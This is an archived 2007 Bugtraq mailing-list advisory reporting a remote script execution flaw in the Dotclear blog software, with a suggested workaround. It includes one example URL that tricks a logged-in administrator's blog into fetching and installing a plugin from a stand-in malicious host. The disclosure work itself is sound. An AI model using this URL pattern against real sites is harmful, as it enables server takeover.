lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Wed, 11 Jul 2007 19:38:36 +0200
From: Sacha <digimag@...il.com>
To: bugtraq@...urityfocus.com
Subject: Dotclear remote script execution

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Hello,

There is a French website about two vulnerabilities ; the one works on
Wordpress (27/05/2007) and the other on Dotclear (08/07/2007) :

http://ar3av.free.fr/sommaire.php


If a Dotclear blog administrator is logged in (or has a cookie for
automatic identification), you can redirect him (by an image posted in
his forum for example) to an URL such as :
http://the-dotclear-blog.com/dotclear/ecrire/tools.php?tool_url=http://www.malicious-website.com/malicious-file.pkg.gz&p=toolsmng
In this case, Dotclear will get, install and activate the plugin
http://www.malicious-website.com/malicious-file.pkg.gz
It's very easy now to execute arbitrary instructions on the remote server.

A temporary solution is to rename admin's folder ("ecrire" for Dotclear
1 or "admin" for Dotclear 2). There is no official patch at this time.

There is some other examples that allow you to add an administrator,
change the website's theme, based on the same concept.

Best regards,
Sacha
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.1 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFGlRWcPiOocQNLzbYRAoFxAJsHoll3YaZPnzUv5gWlh93sNThfLgCeJDFF
GIH89HCHRTXaMSf5gbz9NIM=
=lnZU
-----END PGP SIGNATURE-----

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ